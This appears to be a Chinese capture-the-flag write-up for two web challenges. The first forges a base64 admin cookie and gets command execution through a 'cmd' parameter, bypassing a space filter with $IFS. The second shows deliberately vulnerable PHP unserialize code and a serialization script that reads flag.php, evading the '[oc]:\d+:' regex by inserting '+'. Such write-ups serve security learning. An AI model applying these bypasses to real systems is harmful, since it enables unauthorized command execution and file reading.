ezweb2
扫描目录,发现admin.php,提示不是admin发现cookie有dXNlag%3D%3D的字样,先url解码dXNlag==,猜测base64
image
改成
adminbase64编码后进入admin.php
image
,随便输入,抓包发现变量名为cmd,猜测RCE
image
于是试了个ls /又提示error,经过测试发现过滤了空格,可以用$IFS绕过。
image
读取
image
easy
给了源码
<?php
@error_reporting(1);
include 'flag.php';
class baby
{
public $file;
function __toString()
{
if(isset($this->file))
{
$filename = "./{$this->file}";
if (file_get_contents($filename))
{
return file_get_contents($filename);
}
}
}
}
if (isset($_GET['data']))
{
$data = $_GET['data'];
preg_match('/[oc]:\d+:/i',$data,$matches);
if(count($matches))
{
die('Hacker!');
}
else
{
$good = unserialize($data);
echo $good;
}
}
else
{
highlight_file("./index.php");
}
?>
可以通过反序列化进行任意文件读取
<?php
class baby
{
public $file = 'flag.php';
function __toString()
{
$this->file;
if(isset($this->file))
{
$filename = "./{$this->file}";
print_r($filename);
if (file_get_contents($filename))
{
return file_get_contents($filename);
}
}
}
}
$baby = new baby();
$a = serialize($baby);
echo $a;
但是正则preg_match('/[oc]:\d+:/i',$data,$matches);waf掉了[oc]:数字。在四前面加%2B就可以了,也就是+
image
网友评论